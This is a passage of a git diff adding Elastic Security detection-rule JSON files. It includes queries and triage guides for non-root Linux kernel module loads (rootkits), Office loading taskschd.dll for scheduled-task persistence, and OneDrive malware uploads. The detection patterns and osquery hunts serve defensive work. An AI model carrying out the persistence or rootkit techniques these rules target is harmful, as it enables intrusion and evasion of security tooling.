+ { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "b9960fef-82c6-4816-befa-44745030e917", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Initial Access", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + } + ] + }, + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1195", + "name": "Supply Chain Compromise", + "reference": "https://attack.mitre.org/techniques/T1195/", + "subtechnique": [ + { + "id": "T1195.002", + "name": "Compromise Software Supply Chain", + "reference": "https://attack.mitre.org/techniques/T1195/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "b9960fef-82c6-4816-befa-44745030e917_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ba81c182-4287-489d-af4d-8ae834b06040_2.json b/packages/security_detection_engine/kibana/security_rule/ba81c182-4287-489d-af4d-8ae834b06040_2.json new file mode 100644 index 00000000000..719a1186c7c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ba81c182-4287-489d-af4d-8ae834b06040_2.json @@ -0,0 +1,100 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects the loading of a Linux kernel module by a non-root user through system calls. Threat actors may leverage Linux kernel modules to load a rootkit on a system providing them with complete control and the ability to hide from security products. As other rules monitor for the addition of Linux kernel modules through system utilities or .ko files, this rule covers the gap that evasive rootkits leverage by monitoring for kernel module additions on the lowest level through auditd_manager.", + "from": "now-9m", + "index": [ + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Kernel Driver Load by non-root User", + "query": "driver where host.os.type == \"linux\" and event.action == \"loaded-kernel-module\" and\nauditd.data.syscall in (\"init_module\", \"finit_module\") and user.id != \"0\"\n", + "related_integrations": [ + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "auditd.data.syscall", + "type": "unknown" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "ba81c182-4287-489d-af4d-8ae834b06040", + "setup": "\nThis rule requires data coming in from Auditd Manager.\n\n### Auditd Manager Integration Setup\nThe Auditd Manager Integration receives audit events from the Linux Audit Framework which is a part of the Linux kernel.\nAuditd Manager provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system.\n\n#### The following steps should be executed in order to add the Elastic Agent System integration \"auditd_manager\" on a Linux System:\n- Go to the Kibana home page and click \u201cAdd integrations\u201d.\n- In the query bar, search for \u201cAuditd Manager\u201d and select the integration to see more details about it.\n- Click \u201cAdd Auditd Manager\u201d.\n- Configure the integration name and optionally add a description.\n- Review optional and advanced settings accordingly.\n- Add the newly installed \u201cauditd manager\u201d to an existing or a new agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n- Click \u201cSave and Continue\u201d.\n- For more details on the integration refer to the [helper guide](https://docs.elastic.co/integrations/auditd_manager).\n\n#### Rule Specific Setup Note\nAuditd Manager subscribes to the kernel and receives events as they occur without any additional configuration.\nHowever, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n- For this detection rule the following additional audit rules are required to be added to the integration:\n -- \"-a always,exit -F arch=b64 -S finit_module -S init_module -S delete_module -F auid!=-1 -k modules\"\n -- \"-a always,exit -F arch=b32 -S finit_module -S init_module -S delete_module -F auid!=-1 -k modules\"\n\n", + "severity": "medium", + "tags": [ + "Data Source: Auditd Manager", + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.006", + "name": "Kernel Modules and Extensions", + "reference": "https://attack.mitre.org/techniques/T1547/006/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1014", + "name": "Rootkit", + "reference": "https://attack.mitre.org/techniques/T1014/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 2 + }, + "id": "ba81c182-4287-489d-af4d-8ae834b06040_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ba81c182-4287-489d-af4d-8ae834b06040_3.json b/packages/security_detection_engine/kibana/security_rule/ba81c182-4287-489d-af4d-8ae834b06040_3.json new file mode 100644 index 00000000000..ea6383e6d9f --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ba81c182-4287-489d-af4d-8ae834b06040_3.json @@ -0,0 +1,100 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects the loading of a Linux kernel module by a non-root user through system calls. Threat actors may leverage Linux kernel modules to load a rootkit on a system providing them with complete control and the ability to hide from security products. As other rules monitor for the addition of Linux kernel modules through system utilities or .ko files, this rule covers the gap that evasive rootkits leverage by monitoring for kernel module additions on the lowest level through auditd_manager.", + "from": "now-9m", + "index": [ + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Kernel Driver Load by non-root User", + "query": "driver where host.os.type == \"linux\" and event.action == \"loaded-kernel-module\" and\nauditd.data.syscall in (\"init_module\", \"finit_module\") and user.id != \"0\"\n", + "related_integrations": [ + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "auditd.data.syscall", + "type": "unknown" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "ba81c182-4287-489d-af4d-8ae834b06040", + "setup": "## Setup\n\n\nThis rule requires data coming in from Auditd Manager.\n\n### Auditd Manager Integration Setup\nThe Auditd Manager Integration receives audit events from the Linux Audit Framework which is a part of the Linux kernel.\nAuditd Manager provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system.\n\n#### The following steps should be executed in order to add the Elastic Agent System integration \"auditd_manager\" on a Linux System:\n- Go to the Kibana home page and click \u201cAdd integrations\u201d.\n- In the query bar, search for \u201cAuditd Manager\u201d and select the integration to see more details about it.\n- Click \u201cAdd Auditd Manager\u201d.\n- Configure the integration name and optionally add a description.\n- Review optional and advanced settings accordingly.\n- Add the newly installed \u201cauditd manager\u201d to an existing or a new agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n- Click \u201cSave and Continue\u201d.\n- For more details on the integration refer to the [helper guide](https://docs.elastic.co/integrations/auditd_manager).\n\n#### Rule Specific Setup Note\nAuditd Manager subscribes to the kernel and receives events as they occur without any additional configuration.\nHowever, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n- For this detection rule the following additional audit rules are required to be added to the integration:\n -- \"-a always,exit -F arch=b64 -S finit_module -S init_module -S delete_module -F auid!=-1 -k modules\"\n -- \"-a always,exit -F arch=b32 -S finit_module -S init_module -S delete_module -F auid!=-1 -k modules\"\n", + "severity": "medium", + "tags": [ + "Data Source: Auditd Manager", + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.006", + "name": "Kernel Modules and Extensions", + "reference": "https://attack.mitre.org/techniques/T1547/006/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1014", + "name": "Rootkit", + "reference": "https://attack.mitre.org/techniques/T1014/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 3 + }, + "id": "ba81c182-4287-489d-af4d-8ae834b06040_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/baa5d22c-5e1c-4f33-bfc9-efa73bb53022_108.json b/packages/security_detection_engine/kibana/security_rule/baa5d22c-5e1c-4f33-bfc9-efa73bb53022_108.json new file mode 100644 index 00000000000..fcd8ac1f8b1 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/baa5d22c-5e1c-4f33-bfc9-efa73bb53022_108.json @@ -0,0 +1,131 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a suspicious image load (taskschd.dll) from Microsoft Office processes. This behavior may indicate adversarial activity where a scheduled task is configured via Windows Component Object Model (COM). This technique can be used to configure persistence and evade monitoring by avoiding the usage of the traditional Windows binary (schtasks.exe) used to manage scheduled tasks.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Image Load (taskschd.dll) from MS Office", + "note": "## Triage and analysis\n\n### Investigating Suspicious Image Load (taskschd.dll) from MS Office\n\nMicrosoft Office, a widely used suite of productivity applications, is frequently targeted by attackers due to its popularity in corporate environments. These attackers exploit its extensive capabilities, like macro scripts in Word and Excel, to gain initial access to systems. They often use Office documents as delivery mechanisms for malware or phishing attempts, taking advantage of their trusted status in professional settings.\n\n`taskschd.dll` provides Command Object Model (COM) interfaces for the Windows Task Scheduler service, allowing developers to programmatically manage scheduled tasks.\n\nThis rule looks for an MS Office process loading `taskschd.dll`, which may indicate an adversary abusing COM to configure a scheduled task. This can happen as part of a phishing attack, when a malicious office document registers the scheduled task to download the malware \"stage 2\" or to establish persistent access.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n### Possible investigation steps\n\n- Analyze the host's scheduled tasks and explore the related Windows events to determine if tasks were created or deleted (Event IDs 4698 and 4699).\n- Investigate any abnormal behavior by the subject process, such as network connections, registry or file modifications, and spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Examine the files downloaded during the past 24 hours.\n - Identify files that are related or can be executed in MS Office.\n - Identify and analyze macros that these documents contain.\n - Identify suspicious traits in the office macros, such as encoded or encrypted sections.\n- Retrieve the suspicious files identified in the previous step and determine if they are malicious:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Related Rules\n\n- Suspicious WMI Image Load from MS Office - 891cb88e-441a-4c3e-be2d-120d99fe7b0d\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n - If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "any where host.os.type == \"windows\" and\n (event.category : (\"library\", \"driver\") or (event.category == \"process\" and event.action : \"Image loaded*\")) and\n process.name : (\"WINWORD.EXE\", \"EXCEL.EXE\", \"POWERPNT.EXE\", \"MSPUB.EXE\", \"MSACCESS.EXE\") and\n (?dll.name : \"taskschd.dll\" or file.name : \"taskschd.dll\")\n", + "references": [ + "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", + "https://www.clearskysec.com/wp-content/uploads/2020/10/Operation-Quicksand.pdf" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "dll.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "baa5d22c-5e1c-4f33-bfc9-efa73bb53022", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1053", + "name": "Scheduled Task/Job", + "reference": "https://attack.mitre.org/techniques/T1053/", + "subtechnique": [ + { + "id": "T1053.005", + "name": "Scheduled Task", + "reference": "https://attack.mitre.org/techniques/T1053/005/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1053", + "name": "Scheduled Task/Job", + "reference": "https://attack.mitre.org/techniques/T1053/", + "subtechnique": [ + { + "id": "T1053.005", + "name": "Scheduled Task", + "reference": "https://attack.mitre.org/techniques/T1053/005/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "baa5d22c-5e1c-4f33-bfc9-efa73bb53022_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/baa5d22c-5e1c-4f33-bfc9-efa73bb53022_109.json b/packages/security_detection_engine/kibana/security_rule/baa5d22c-5e1c-4f33-bfc9-efa73bb53022_109.json new file mode 100644 index 00000000000..187054d3a3f --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/baa5d22c-5e1c-4f33-bfc9-efa73bb53022_109.json @@ -0,0 +1,131 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a suspicious image load (taskschd.dll) from Microsoft Office processes. This behavior may indicate adversarial activity where a scheduled task is configured via Windows Component Object Model (COM). This technique can be used to configure persistence and evade monitoring by avoiding the usage of the traditional Windows binary (schtasks.exe) used to manage scheduled tasks.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.library-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Image Load (taskschd.dll) from MS Office", + "note": "## Triage and analysis\n\n### Investigating Suspicious Image Load (taskschd.dll) from MS Office\n\nMicrosoft Office, a widely used suite of productivity applications, is frequently targeted by attackers due to its popularity in corporate environments. These attackers exploit its extensive capabilities, like macro scripts in Word and Excel, to gain initial access to systems. They often use Office documents as delivery mechanisms for malware or phishing attempts, taking advantage of their trusted status in professional settings.\n\n`taskschd.dll` provides Command Object Model (COM) interfaces for the Windows Task Scheduler service, allowing developers to programmatically manage scheduled tasks.\n\nThis rule looks for an MS Office process loading `taskschd.dll`, which may indicate an adversary abusing COM to configure a scheduled task. This can happen as part of a phishing attack, when a malicious office document registers the scheduled task to download the malware \"stage 2\" or to establish persistent access.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n### Possible investigation steps\n\n- Analyze the host's scheduled tasks and explore the related Windows events to determine if tasks were created or deleted (Event IDs 4698 and 4699).\n- Investigate any abnormal behavior by the subject process, such as network connections, registry or file modifications, and spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Examine the files downloaded during the past 24 hours.\n - Identify files that are related or can be executed in MS Office.\n - Identify and analyze macros that these documents contain.\n - Identify suspicious traits in the office macros, such as encoded or encrypted sections.\n- Retrieve the suspicious files identified in the previous step and determine if they are malicious:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Related Rules\n\n- Suspicious WMI Image Load from MS Office - 891cb88e-441a-4c3e-be2d-120d99fe7b0d\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n - If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "any where host.os.type == \"windows\" and\n (event.category : (\"library\", \"driver\") or (event.category == \"process\" and event.action : \"Image loaded*\")) and\n process.name : (\"WINWORD.EXE\", \"EXCEL.EXE\", \"POWERPNT.EXE\", \"MSPUB.EXE\", \"MSACCESS.EXE\") and\n (?dll.name : \"taskschd.dll\" or file.name : \"taskschd.dll\")\n", + "references": [ + "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", + "https://www.clearskysec.com/wp-content/uploads/2020/10/Operation-Quicksand.pdf" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "dll.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "baa5d22c-5e1c-4f33-bfc9-efa73bb53022", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1053", + "name": "Scheduled Task/Job", + "reference": "https://attack.mitre.org/techniques/T1053/", + "subtechnique": [ + { + "id": "T1053.005", + "name": "Scheduled Task", + "reference": "https://attack.mitre.org/techniques/T1053/005/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1053", + "name": "Scheduled Task/Job", + "reference": "https://attack.mitre.org/techniques/T1053/", + "subtechnique": [ + { + "id": "T1053.005", + "name": "Scheduled Task", + "reference": "https://attack.mitre.org/techniques/T1053/005/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "baa5d22c-5e1c-4f33-bfc9-efa73bb53022_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/bba1b212-b85c-41c6-9b28-be0e5cdfc9b1_103.json b/packages/security_detection_engine/kibana/security_rule/bba1b212-b85c-41c6-9b28-be0e5cdfc9b1_103.json new file mode 100644 index 00000000000..4224ff9b548 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/bba1b212-b85c-41c6-9b28-be0e5cdfc9b1_103.json @@ -0,0 +1,83 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the occurence of files uploaded to OneDrive being detected as Malware by the file scanning engine. Attackers can use File Sharing and Organization Repositories to spread laterally within the company and amplify their access. Users can inadvertently share these files without knowing their maliciousness, giving adversaries opportunity to gain initial access to other endpoints in the environment.", + "false_positives": [ + "Benign files can trigger signatures in the built-in virus protection" + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "OneDrive Malware File Upload", + "note": "", + "query": "event.dataset:o365.audit and event.provider:OneDrive and event.code:SharePointFileOperation and event.action:FileMalwareDetected\n", + "references": [ + "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/virus-detection-in-spo?view=o365-worldwide" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "bba1b212-b85c-41c6-9b28-be0e5cdfc9b1", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "high", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Tactic: Lateral Movement" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1080", + "name": "Taint Shared Content", + "reference": "https://attack.mitre.org/techniques/T1080/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 103 + }, + "id": "bba1b212-b85c-41c6-9b28-be0e5cdfc9b1_103", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/bba1b212-b85c-41c6-9b28-be0e5cdfc9b1_105.json b/packages/security_detection_engine/kibana/security_rule/bba1b212-b85c-41c6-9b28-be0e5cdfc9b1_105.json new file mode 100644 index 00000000000..c5a4b3785e9 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/bba1b212-b85c-41c6-9b28-be0e5cdfc9b1_105.json @@ -0,0 +1,83 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the occurence of files uploaded to OneDrive being detected as Malware by the file scanning engine. Attackers can use File Sharing and Organization Repositories to spread laterally within the company and amplify their access. Users can inadvertently share these files without knowing their maliciousness, giving adversaries opportunity to gain initial access to other endpoints in the environment.", + 